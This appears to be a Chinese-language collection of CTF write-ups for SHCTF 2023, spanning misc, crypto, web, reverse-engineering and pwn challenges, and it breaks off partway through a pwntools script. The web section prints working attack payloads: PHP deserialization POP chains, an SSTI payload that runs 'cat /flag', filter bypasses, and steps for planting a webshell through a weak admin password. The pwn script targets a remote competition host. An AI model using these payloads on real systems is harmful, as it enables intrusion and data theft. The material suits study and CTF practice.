在线工具
赛博厨子(非常好用的解码工具)
n在线分解工具
推荐工具
MISC:
1、https://blog.csdn.net/m0_47643893/article/details/113867849
CRYPTO:
随波逐流,toolsfx,yafu
PWN:
1、libc资源下载BUUCTF在线评测 (buuoj.cn)
MISC
入门推荐
b站搜Byxs20
[WEEK1]请对我使用社工吧
利用qq反查工具找到大概地址
搜索,看到名校,直接尝试中国石油大学,成功
[WEEK1]也许需要一些py
打开zip,发现两个文件和一串摩斯,摩斯解码后得到key(需要转小写)
打开得到一个fakeflag
可知第一个文件为png文件修复一下可以得到一串md5值
用md5值对fakeflag进行爆破修复,得到正确的flag
import hashlib
def find_string_with_md5(md5_hash):
original_string = "pNg_and_Md5_SO_GreaT"
for i in range(2**len(original_string)):
new_string = ""
for j in range(len(original_string)):
if i & (1<<j):
new_string += original_string[j].swapcase()
else:
new_string += original_string[j]
hash_object = hashlib.md5(new_string.encode())
if hash_object.hexdigest() == md5_hash:
return new_string
return ""
md5_hash = "63e62fbce22f2757f99eb7da179551d2"
result = find_string_with_md5(md5_hash)
if result:
print("The original string is: {}".format(result))
else:
print("Failed to find the string that matches the MD5 hash value.")
# Png_AnD_md5_so_GReAt[WEEK1]ez-misc
txt中是一长串二进制,第一想法就是二进制转图片
扫描二维码,得到密码
取出flag文件,将后最改成zip,摩斯解密,发现hint
kali!启动!直接上爆破
得到密码,打开flag.txt,看到是大量的字符,使用随波逐流尝试词频统计,得到flag
[WEEK1]签到题
厨子一把梭
[WEEK1]Jaeger lover
打开附件,有一张jpg图片和一个zip,010打开jpg,末尾处有一段base64,解密得到一个hint
大概意思是要获取一个操作系统,再通过描述,图片和图片名,可知是环太平洋电影中的暴风赤红机器人的操作系统
原本以为是压缩包密码,但尝试无果。随后使用其他jpg图片的隐写方法,最终使用steghigh得到了密码,得到第二张图片
看到下面不全,直接修改图片高度,将04改为05,又得到一个key,开始尝试png的隐写,最终使用oursecret获取到了flag
[WEEK1]Steganography
两张图片,一开始以为是盲水印,但尝试后无果尝试其他方法,在careful1的属性的信息中备注有些东西,猜测为部分密钥
开始寻找另一部分,把careful放到010中,在末尾处发现了一段base64,解码
将中间的替换掉就是压缩包的密码,解开就可以得到flag
[WEEK1]可爱的派蒙捏
拿到一张jpg图片,在文件末尾处看到有另一个PK标识符,直接binwalk分离,得到两个txt
直接使用010对两个文件进行对比,一个个手搓得到flag
[WEEK1]message
16进制,将00删掉,厨子一把梭
[WEEK1]真的签到
扫描二维码,加公众号,回复获得flag
[WEEK2]远在天边近在眼前
下载得到压缩包,解压,文件名拼接反转即可得到flag
[WEEK2]奇怪的screenshot
根据文件描述和图片已知部分,可知为win的截图漏洞
https://github.com/frankthetank-music/Acropalypse-Multi-Tool?search=1
利用工具修复得到完整图片,提取其中的文字进行百家姓解密得到flag
[WEEK2]可爱的洛琪希
未加密,7Z解压工具可以直接解压,得到一串base64,转为图片
属性中有一段hex,010查看得到key
最后维吉尼亚解密即可得到flag
WEB
入门推荐
web神太多了,这里就先挂一个探姬师傅的项目
CTF, 启动! - Hello CTF (probius.xyz)
[WEEK1]babyRCE
分析源码,可知禁用了很多查看命令,数字和很多符号,但是没有禁用uniq函数,但是过滤了空格,所以使用${IFS}进行绕过
因为过滤了flag字符,需要使用通配符来绕过
[WEEK1]1zzphp
分析源码,第一步需要给num传参,不能为数字,但intval函数是用于获取参数的整数值,如果不是数字,就会返回FALSE,所以我们采用数组来绕过第一段。然后进入第二段过滤,利用PCRE时间回溯漏洞,通过发送大量字符串,使其超过返回上限即可绕过
PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)
<?php
echo str_repeat('very', '250000').'2023SHCTF';
?>
[WEEK1]ez_serialize
一道较为基础的反序列化链子(新生赛第一周属实是偏难了,T^T)
有且仅有一篇文章推荐
php 反序列化总结_php反序列化总结_练习两年半的篮球选..哦不对安全选手的博客-CSDN博客
<?php
highlight_file(__FILE__);
class A{
public $var_1;
public function __invoke(){
include($this->var_1);
}
}
class B{
public $q;
public function __wakeup()
{
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
echo "hacker";
}
}
}
class C{
public $var;
public $z;
public function __toString(){
return $this->z->var;
}
}
class D{
public $p;
public function __get($key){
$function = $this->p;
return $function();
}
}
$a=new A();
$b=new B();
$c=new C();
$d=new D();
$b->q=$c;
$c->z=$d;
$c->var=$c;
$d->p=$a;
$a->var_1="php://filter/convert.base64-encode/resource=flag.php";
echo serialize($b);
?>
[WEEK1]登录就给flag
点击登录,等待3秒,跳转到登录页面,尝试弱口令admin和password,登录成功
[WEEK1]飞机大战
右键查看源代码,查看JS代码
简单分析一下,找到flag输出的位置
转码获得一串base64,解密即可获得flag
[WEEK1]ezphp
不知道是故意的还是不小心的,第一个过滤接收字符在判断之后,可以直接忽视
随后就是漏洞利用,这里是\e的命令执行
深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)
[WEEK1]生成你的邀请函吧~
postman发包即可
[WEEK2]no_wake_up
简单的反序列化
<?php
class flag{
public $username="admin";
public $code="php://filter/convert.base64-encode/resource=flag.php";
}
$a=new flag();
echo serialize($a);
解密即可获得flag
[WEEK2]ez_ssti
ssti一把梭
?name={{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}
[WEEK2]EasyCMS
扫描目录,找到后门登录
http://112.6.51.212:32655/admin/admin.php
弱口令登录
admin/tao
点击文件管理,创建新文件,写入一句话木马
命令执行即可得到flag
[WEEK2]serialize
简单的POP链
<?php
class misca{
public $gao;
public $fei;
public $a;
public function __get($key){
echo "misca: __get: <br>";
var_dump($key);
$this->miaomiao();
var_dump($this->fei);
$this->gao=$this->fei;
die($this->a);
}
public function miaomiao(){
echo "miaomiao:<br>";
$this->a='Mikey Mouse~';
}
}
class musca{
public $ding;
public $dong;
public function __wakeup(){
echo "musca: __wakeup: <br>";
return $this->ding->dong;
}
}
class milaoshu{
public $v;
public function __tostring(){
echo"misca~musca~milaoshu~~~";
include($this->v);
}
}
function check($data){
if(preg_match('/^O:\d+/',$data)){
die("you should think harder!");
}
else return $data;
}
$m = new musca();
$mi = new misca();
$mls = new milaoshu();
$mls->v = "php://filter/convert.base64-encode/resource=flag.php";
$mi->fei = $mls;
$mi->gao = &$mi->a;
$m->ding = $mi;
echo urlencode(serialize(array($m)));
$t = $_GET["wanna_fl.ag"];
var_dump($t);
unserialize(check($t));
base64解密即可
REVERSE
进阶推荐
b站搜水番正文
[WEEK1]ez_asm
入门基础,汇编语言
a = 'nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y'
b = ''
for i in range(len(a)):
b += chr((ord(a[i]) + 0x0A ) ^ 0x1E)
print(b) #flag{It_is_als0_impor@nt_t0_13arn_4sm!}[WEEK1]easy_re
基础的代码分析
a = [ 0x66, 0xC6, 0x16, 0x76, 0xB7, 0x45, 0x27, 0x97, 0xF5, 0x47,
0x03, 0xF5, 0x37, 0x03, 0xC6, 0x67, 0x33, 0xF5, 0x47, 0x86,
0x56, 0xF5, 0x26, 0x96, 0xE6, 0x16, 0x27, 0x97, 0xF5, 0x07,
0x27, 0x03, 0x26, 0xC6, 0x33, 0xD6, 0xD7, 0x00]
flag = ''
for i in range(len(a)):
flag += chr((16 * a[i] | a[i] >> 4) & 0xff)
print(flag) #flag{Try_t0_s0lv3_the_binary_pr0bl3m}[WEEK1]seed
随机数,但是双击seed并没有看到种子的值,直接开调试,这里有多种方法
The First
因为调试可以直接把值存放到v5中,所以我们直接在第一个循环后面下断点,在查看v5就可以获得v5数组的值,提取即可
key = [0x26, 0x45, 0x49, 0x8E, 0xB9, 0x43, 0xCD, 0x9B, 0xFA, 0x0C]
flag = ''
a = [0x40, 0x29, 0x28, 0xE9, 0xC2, 0x04, 0xA4, 0xED,
0x9F, 0x53, 0x5F, 0x75, 0x3C, 0xD1, 0xCD,
0x2B, 0xA8, 0xC4, 0x89, 0x69, 0x15, 0x21, 0x16,
0xEF, 0xD7, 0x27, 0x92, 0xDF, 0xCA, 0x53,
0x5F, 0x2A, 0x3C, 0xD1, 0xCE, 0x03, 0xA3, 0xEF,
0xA5, 0x78, 0x16, 0x1A, 0x2D, 0xE1, 0xC4]
for i in range(len(a)):
flag += chr(a[i] ^ key[i % len(key)])
print(flag) #flag{Give_y0u_the_se3d_and_D0_you_w@nt_t0_do}The Second
使用idapython将我们输入的值替换
from idaapi import *
addr = 0x64FDB0 #输入的地址
a = [0x40,0x29,0x28,0xE9,0xC2,0x04,0xA4,0xED,0x9F,0x53,0x5F,0x75,0x3C,0xD1,0xCD,0x2B,0xA8,0xC4,
0x89,0x69,0x15,0x21,0x16,0xEF,0xD7,0x27,0x92,0xDF,0xCA,0x53,0x5F,0x2A,0x3C,0xD1,0xCE,0x03,
0xA3,0xEF,0xA5,0x78,0x16,0x1A,0x2D,0xE1,0xC4]
for i in range(len(a)):
patch_byte(addr+i,a[i])
[WEEK1]signin
打开就能看到flag
[WEEK1]easy_math
多次方程,一眼经典z3
python z3库学习_python的z3库-CSDN博客
from z3 import *
# 定义变量
l0, l1, l2, l3, l4, l5 = Ints('l0 l1 l2 l3 l4 l5')
# 定义方程组
eq1 = (593*l0 + 997*l1 + 811*l2 + 258*l3 + 829*l4 + 532*l5) == 0x5b8e0aef71d34ff43
eq2 = (605*l0 + 686*l1 + 328*l2 + 602*l3 + 695*l4 + 576*l5) == 0x551a262360964ef7f
eq3 = (373*l0 + 512*l1 + 449*l2 + 756*l3 + 448*l4 + 580*l5) == 0x49d158a5657d6931c
eq4 = (560*l0 + 635*l1 + 422*l2 + 971*l3 + 855*l4 + 597*l5) == 0x625568d5abbabf4f3
eq5 = (717*l0 + 507*l1 + 388*l2 + 925*l3 + 324*l4 + 524*l5) == 0x50ee0c025e70e3c23
eq6 = (312*l0 + 368*l1 + 884*l2 + 518*l3 + 495*l4 + 414*l5) == 0x40e735f8aa2815f65
# 创建Solver对象
solver = Solver()
# 添加约束条件
solver.add(eq1)
solver.add(eq2)
solver.add(eq3)
solver.add(eq4)
solver.add(eq5)
solver.add(eq6)
# 求解方程组
if solver.check() == sat:
model = solver.model()
model[l0].as_long()
model[l1].as_long()
model[l2].as_long()
model[l3].as_long()
model[l4].as_long()
model[l5].as_long()
print("l0 =", hex(l0_val))
print("l1 =", hex(l1_val))
print("l2 =", hex(l2_val))
print("l3 =", hex(l3_val))
print("l4 =", hex(l4_val))
print("l5 =", hex(l5_val))
l0 = 0x666c61677b4e30
l1 = 0x5f4f6e655f6b6e
l2 = 0x3077735f6d4074
l3 = 0x685f4233747465
l4 = 0x725f5468406e5f
l5 = 0x6d65212121217d
# # 将十六进制数值转换为对应的字节串
b0 = bytes.fromhex(hex(l0)[2:])
b1 = bytes.fromhex(hex(l1)[2:])
b2 = bytes.fromhex(hex(l2)[2:])
b3 = bytes.fromhex(hex(l3)[2:])
b4 = bytes.fromhex(hex(l4)[2:])
b5 = bytes.fromhex(hex(l5)[2:])
# 将字节串连接起来并解码为字符串
result = (b0 + b1 + b2 + b3 + b4 + b5).decode()
print(result) #flag{N0_One_kn0ws_m@th_B3tter_Th@n_me!!!!}[WEEK1]ez_apk
利用字符串找到main函数
在main函数中,我们可以看到加密函数,ctrl点击即可查看此函数
在加密函数中,可以看到一串字符串,一眼base58的码表,开始找密文,因为使用的是jadx,密文没有直接找到,而是在main函数的smali中
使用厨子,解密获得flag
[WEEK2]签到题?
直接开调
经过加密之后,查看取值数组,发现flag的base64加密头,取值,解密即可
[WEEK2]not gcc
利用命令将文件编译成程序,然后分析代码,利用chat辅助分析得知是一个数独,提取数字,在线数独解题,原数和解数异或后md5解密即可获得flag(
(81个数字,眼睛都快瞎掉了)
a = '407003208500020900012980004709104800061000470003270006086300040020740630304002000'
b = '497513268538426917612987354759164823261839475843275196986351742125748639374692581'
for i in range(len(a)):
print(int(a[i]) ^ int(b[i]),end='')
#090510060038406017600007350050060023200839005840005190900051702105008009070690581[WEEK2]pycode
粗略的阅读代码可知,将flag进行加密后替换了一些字符并倒叙,且中间插入了大量无用代码
将密文替换并翻转解密
a = 'qglrv<m>A4=;p(n<3;(m=@;(A@>B(>;=>3q@x'
b = 'ndios9j;>1:8m%k908%j:=8%>=;?%;8:;0n=u'
flag = ''
# for i in range(len(a)):
# b += chr(ord(a[i]) - 3)
for i in range(len(b)):
flag += chr(ord(b[i]) ^ 8)
print(flag)
#flag{1b36920e-c180-b250-6537-30238f5}[WEEK2]Run?润!
看题目,一眼迷宫,还是立体,直接开调提取迷宫
一共8层,调试可获得第一层,先将第一层解出,调试输入路径后输入大量u,即可获得后几层的迷宫(这里需要注意层数的变化,调试慢一点)
# ssdddssuuuwwwwqqqdddduussaauuuaaaaassssqddddddduuwwwaasusssdd
# # 0
# 0, 1, 0, 0, 0, 0, 0, 0,
# 0, 1, 1, 1, 1, 1, 1, 1,
# 0, 0, 0, 0, 1, 1, 1, 1,
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1
# # 1
# 1, 1, 1, 0, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1
# # 2
# 1, 1, 1, 0, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 0, 0, 0,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1
# # 3
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 0, 1, 0, 1, 1,
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 0, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1
# # 4
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 0, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 0, 0, 0, 0, 0, 0, 0, 0,
# 1, 1, 1, 1, 1, 1, 1, 1
# # 5
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 0, 0, 0, 0, 0, 0, 1, 1,
# 0, 1, 1, 1, 1, 1, 1, 1,
# 0, 1, 1, 1, 1, 1, 1, 1,
# 0, 1, 1, 1, 1, 1, 1, 1,
# 0, 1, 1, 1, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 1
# # 6
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 0, 0, 0,
# 1, 1, 1, 1, 1, 0, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 0,
# 1, 1, 1, 1, 1, 1, 1, 1
# # 7
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 1, 1, 1,
# 1, 1, 1, 1, 1, 0, 1, 1,
# 1, 1, 1, 1, 1, 0, 1, 1,
# 1, 1, 1, 1, 1, 0, 1, 1,
# 1, 1, 1, 1, 1, 0, 0, 0也可以自写代码获得迷宫,借用devil_1宝宝的代码
dword=[0x407F0FEF,0x0EFFFFFFF,0x0EEFFFFFF,0x0EFFFFFFF,0x0EEFEF8FF,0x0EFFFFFFF,0x0EFEFEBEF,0x0EFFFFFFF,0x0FFFFFBFF,0x0FFFF00FF,0x0FFFF037F,0x7F7F7EFF,0x0FFFFFFF8,0x0FAFEFEFF,0x0FFFFFFFF,0x0FBFBFBF8]
mapss=[]
v5=0
for key in range(0,8):
maps = [0] * 64
v5 = 0
for i in range(2):
for j in range(31,-1,-1):
v0=v5
v5+=1
maps[v0]=(dword[2 * key + i] >> j) & 1
mapss.append(maps)
for i in mapss:
for k in range(0,len(i),8):
print("".join(map(str,i[k:k+8])))
print()
[WEEK2]Authur's_box
RC4加密,idapython一把梭
from idaapi import *
addr = 0x61FD10 #输入的地址
a = [ 0xF5, 0x19, 0x5D, 0xAC, 0xC6, 0xF1, 0xBC, 0x03, 0xA5, 0x11,
0x69, 0xAA, 0x20, 0xBB, 0x18, 0xE7, 0xF9, 0x16, 0x07, 0x18,
0x8F, 0xC5, 0xDC, 0x31, 0x40, 0xC6, 0x09, 0xC1, 0x62, 0x11,
0xA1, 0x96, 0xFD, 0xB9, 0xBF, 0x4F, 0x6A, 0xE6, 0x54, 0xF9,
0x67, 0x41]
for i in range(len(a)):
patch_byte(addr+i,a[i])
[WEEK3]java是最棒的语言吗
用java写的chacha20算法,来一点小小的爆破
package ChaCha20;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Scanner;
public class ChaCha20 {
private static byte[] encrypt(byte[] var0, byte[] var1, byte[] var2) {
int[] var3 = chachaInit(var1, var2);
byte[] var4 = new byte[var0.length];
byte[] var5 = new byte[64];
for(int var6 = 0; var6 < var0.length; var6 += 64) {
chachaBlock(var3, var5);
for(int var7 = 0; var7 < 64 && var6 + var7 < var0.length; ++var7) {
var4[var6 + var7] = (byte)(var0[var6 + var7] ^ var5[var7]);
}
int var10002 = var3[12]++;
}
return var4;
}
private static int[] chachaInit(byte[] var0, byte[] var1) {
int[] var2 = new int[16];
var2[0] = 1634760805;
var2[1] = 857760878;
var2[2] = 2036477234;
var2[3] = 1797285236;
for(int var3 = 0; var3 < 8; ++var3) {
var2[4 + var3] = bytesToIntLittleEndian(var0, var3 * 4);
}
var2[12] = 0;
var2[13] = 0;
var2[14] = bytesToIntLittleEndian(var1, 0);
var2[15] = bytesToIntLittleEndian(var1, 4);
return var2;
}
private static void chachaBlock(int[] var0, byte[] var1) {
int[] var2 = Arrays.copyOf(var0, 16);
int var3;
for(var3 = 0; var3 < 10; ++var3) {
chachaDoubleRound(var2);
}
for(var3 = 0; var3 < 16; ++var3) {
intToBytesLittleEndian(var0[var3] + var2[var3], var1, var3 * 4);
}
}
private static void chachaDoubleRound(int[] var0) {
quarterRound(var0, 0, 4, 8, 12);
quarterRound(var0, 1, 5, 9, 13);
quarterRound(var0, 2, 6, 10, 14);
quarterRound(var0, 3, 7, 11, 15);
quarterRound(var0, 0, 5, 10, 15);
quarterRound(var0, 1, 6, 11, 12);
quarterRound(var0, 2, 7, 8, 13);
quarterRound(var0, 3, 4, 9, 14);
}
private static void quarterRound(int[] var0, int var1, int var2, int var3, int var4) {
var0[var1] += var0[var2];
var0[var4] = rotateLeft(var0[var4] ^ var0[var1], 16);
var0[var3] += var0[var4];
var0[var2] = rotateLeft(var0[var2] ^ var0[var3], 12);
var0[var1] += var0[var2];
var0[var4] = rotateLeft(var0[var4] ^ var0[var1], 8);
var0[var3] += var0[var4];
var0[var2] = rotateLeft(var0[var2] ^ var0[var3], 7);
}
private static int rotateLeft(int var0, int var1) {
return var0 << var1 | var0 >>> 32 - var1;
}
private static int bytesToIntLittleEndian(byte[] var0, int var1) {
return (var0[var1 + 3] & 255) << 24 | (var0[var1 + 2] & 255) << 16 | (var0[var1 + 1] & 255) << 8 | var0[var1] & 255;
}
private static void intToBytesLittleEndian(int var0, byte[] var1, int var2) {
var1[var2] = (byte)(var0 & 255);
var1[var2 + 1] = (byte)(var0 >>> 8 & 255);
var1[var2 + 2] = (byte)(var0 >>> 16 & 255);
var1[var2 + 3] = (byte)(var0 >>> 24 & 255);
}
public static void main(String[] var0) {
String flag = "";
for(int i=0;i<42;i++) {
for(int j=33;j<128;j++) {
char ch = (char) j;
String a = flag + Character.toString(ch);
byte[] b = encrypt(a.getBytes(StandardCharsets.UTF_8), "Shctf_Welcomes_Have_4_good_t1me_".getBytes(), "HsehrcOedfgs".getBytes());
String enc = "ce43283af73d106815fe5293b474f5309d44063c7fde19533300c60603dfe528d19aee2f6db615191e45";
byte[] dnc = hexStringToBytes(enc);
if (b[i] == dnc[i]) {
flag = a;
System.out.println(flag);
break;
}
}
}
}
private static byte[] hexStringToBytes(String var0) {
int var1 = var0.length();
byte[] var2 = new byte[var1 / 2];
for(int var3 = 0; var3 < var1; var3 += 2) {
var2[var3 / 2] = (byte)((Character.digit(var0.charAt(var3), 16) << 4) + Character.digit(var0.charAt(var3 + 1), 16));
}
return var2;
}
}
//flag{63955927-5a27-454c-cdc7-7b7cc9020f46}[WEEK3]ststst
SMC + Xtea
万物皆可调试,调试过SMC
Xtea解密
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
int delta = 0x61C88647;
void decrypt(uint32_t* v, uint32_t* k) {
uint32_t v3 = v[0];
uint32_t v4 = v[1];
uint32_t sum = ((32 * (-delta)) & 0xffffffff);
int i = 0;
for (i = 0; i <= 31; i++) {
v4 -= (v3 + sum) ^ (16 * v3 + k[2]) ^ ((v3 >> 5) + k[3]);
v3 -= (v4 + sum) ^ (16 * v4 + k[0]) ^ ((v4 >> 5) + k[1]);
sum += 0x61C88647;
}
v[0] = v3;
v[1] = v4;
}
int main() {
uint32_t key[4] = { 0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210 };
uint32_t array[8] = { 0xDB8F2569, 0x40CD83E3, 0xA033E680, 0xFFF7A644, 0x690C3A17, 0xB621B866, 0x34E7E2A7, 0xAD10A692 }; //密码数据
uint32_t temp[2] = { 0 };
int i = 0;
for (i = 0; i <= 8; i += 2) {
temp[0] = array[i];
temp[1] = array[i + 1];
decrypt(temp, key);
printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));
}
return 0;
}
//5ef846656801c9b9714388d2ccd98cdd[WEEK3]easyre
PYC逆向,pyc三部曲:拆包,反编译,代码审计
Python 反编译:pyinstxtractor工具和uncompyle6库的使用_小嗷犬的博客-CSDN博客
反编译
爆破xor,解密,生成新的pyc
import base64
import marshal
import sympy as sp
encoded_data = b'#`VVVVVVVVVVVVVVVVVVVVVSVVVVFVVVV_YZVVVVMVU|VNFV@pU|V{xUMVYvVzBSMVDSVFRVMFDSV\\VQMV@\x7fVAxPMFU{V@BPp`]vU%B_MF]eVy]VMFY|UxZUVFUbTPBSMVrSVFRVMV\x7fCVT|]N`^VVVVVVVVVVVVVVVpVVVVPVVVVF`VVV_GFVVVVsVU\'V@FUp`PSVO\'TMV].V$FUMVPSVBFVOC".U_`SqV]/UU|VQ`U/V_`RsV]/V^ZUQpVMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVUoPPFTUVU.U_\'SsVXSV_\'QqVQRVQ&pqFM/UPFSQ`U|VENVqFE/V$`TqVFMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVU/Vy`TqVFMV_`TqVZMVUtVMVR@VU|VqFs/UvVRqVM/U\'RVxFRUV_QfqVACVT|RCb|VVFVV!FVVVVSgVFVVVT|Q%pEdvOY\'%pAnN@"yMsxSuPAb%p{~rOE{NO]nNOyvUzQ`tPAbMT|^%pYeMO{vTOUdN@{bsPA#sYxUB.xUvcxUvAx\\N%{`vPAnsPA#sYxRN%\x7f\x7ftcxUv!|Vtp/VVVS!UzM&u~"`rsx[tzZ\'O%AbN$]"t_FUVVVVto`VVVVVVF`UUV^ZVDVU_V^^VFNTTVRZVEVUPpRNVEVTt\x7fRVVVUmT`VVVPA#N@&`uPAqv%A"tnxVVVSN{U!ez%M\'!&&VP ez!UZmA.\'X"g^\'/NUcvXd.TPRTTD!&UB\\`dT.R}Q{!QQUdr~UguyU&sTU"u$An^PMdN@t!rpA&sPNcXQxSr@Am@p]bu\'#gT_^EVVVVtp|VVVUvU@YxM@Ye%pA`tz{bsYxQv@"`sOCvUzAbN%.|MsxRMzo\x7fM&x]M@"}ty{`sPA|tp/VVVUnS`VVV_^GVVVVt\x7fVVVVSvTSocu%E&uPB<VFVVV_ZFVVVVTUFRVFFTTVRZVpxTTVR\\Vp**'
for xor_key in range(101):
x = sp.symbols('x')
f = x ** 2 + x + 1
integral_value = sp.integrate(f, (x, 1, xor_key))
check_value = 13024
if integral_value * 3 == check_value:
xor_decoded_data = bytes([byte ^ xor_key for byte in encoded_data])
decoded_data = base64.b64decode(xor_decoded_data)
open("new.pyc","wb").write(decoded_data)
exit()补头,再次反编译
RC4解密,直接套模板
def init_S():
global S
for i in range(256):
S.append(i)
def init_T():
global Key
global T
Key = 'example_key'
keylen = len(Key)
for i in range(256):
tmp = Key[(i % keylen)]
T.append(tmp)
def swap_S():
j = 0
for i in range(256):
j = (j + S[i] + ord(T[i])) % 256
tmp = S[i]
S[i] = S[j]
S[j] = tmp
def Get_KeyStream():
global KeyStream
txtlen = len(ele) # >= 19
j, t = (0, 0)
for i in range(txtlen):
i = (i + 1) % 256
tmp = S[i]
j = (j + S[i]) % 256
S[i] = S[j]
S[j] = tmp
t = (S[i] + S[j]) % 256
KeyStream.append(S[t])
def Get_Decode():
deres = []
for i in range(len(ele)):
# print(ord(ele[i]),end="")
deres.append(ele[i] ^ KeyStream[i])
return deres
if __name__ == '__main__':
ele = [216,148,30,171,155,102,116,235,93,64,27,186,230,232,19,51,87,221,14,230,146,52,241,128,109,104,235,61,8,97,2,9,46,181,5,66,176,176,47,68,140,89]
# print(len(ele))
T, S, Key = [], [], []
PlainText, CryptoText, KeyStream = '', '', []
text = ""
init_S()
init_T()
swap_S()
Get_KeyStream()
deres = Get_Decode()
print(deres)
for z in deres:
print(chr(z),end="")
#flag{d8e8d9d0-b2b1-7304-74b760-90b11ab6a3}[WEEK3]喵?喵。喵!
GO语言的AES加密
初步分析一下源码
AES-CBC加密
先将密文base64解密,再进行AES解密,密钥长度应该是8位或16位,所以main函数不是密钥,OK,调试找IV和密钥
调试可知密钥为023_S0_e4sy_m1ao,IV为SHCTF_2023_S0_e4
[WEEK3]crackme
lua语言的逆向,利用在线工具反编译,会有一些错误,利用flag{的格式稍作修改(多了一个-1)
https://www.luatool.cn/index.php
分析代码,先对flag进行简单的运算后,随后判断,分支执行异或
先手搓出数组b,然后向前异或,最后爆破,flag需要自己补一个f(比较菜,手搓b可以忽略第一个分支产生的数组越界的问题)
a = [54, 57, 566, 532, 1014, 1, 7, 508, 10, 12, 498, 494, 6, 24, 14, 20, 489, 492, 0, 10,
490, 498, 517, 539, 21, 528, 517, 530, 543, 9, 13, 0, 4, 51, 562, 518, 515, 14, 518,
3, 2, 0, 519, 56, 3, 62, 575, 514, 47, 31, 1, 594, 117, 15]
b = [54, 57, 566, 532, 1014, 1, 7, 508, 10, 12, 498, 494, 6, 24, 14, 20, 489, 492, 0, 10,
490, 498, 517, 539, 21, 528, 517, 530, 543, 9, 13, 0, 4, 51, 562, 518, 515, 14, 518,
3, 2, 0, 519, 56, 3, 62, 575, 514, 47, 527 ,528, 529, 67]
l = len(a) - 6
for i in range(l, -1, -1):
b[i] = b[i] ^ b[i + 1]
print(b, end=',')
code = [0, 553, 543, 550, 16, 516, 498, 499, 500, 8, 2, 14, 508, 18, 20, 12, 2, 22, 511, 19, 19, 25, 499, 1, 516, 31, 10, 538, 31, 525, 18, 27, 22, 22, 18, 33, 531, 21, 534, 536, 30, 29, 31, 31, 536, 544, 547, 541, 34, 544, 527, 528, 529, 67]
print(len(code))
for i in range(1,len(code)):
for j in range(32,128):
if ((j + i) % 333 + 444) % 555 == code[i]:
print(chr(j),end='')
# lag{C000ngr4tulat1ons!Y0u_Cr4cked_m3_45ecdc0792a3!!!}PWN
入门推荐
[WEEK1]nc
nc直接连
[WEEK1]四则计算器
基础的ret2text,利用scanf函数的漏洞,遇到\x00就会停止读取来溢出,跳转到后门函数
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/alloc')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32572)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/alloc')
chooselibc = 1
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
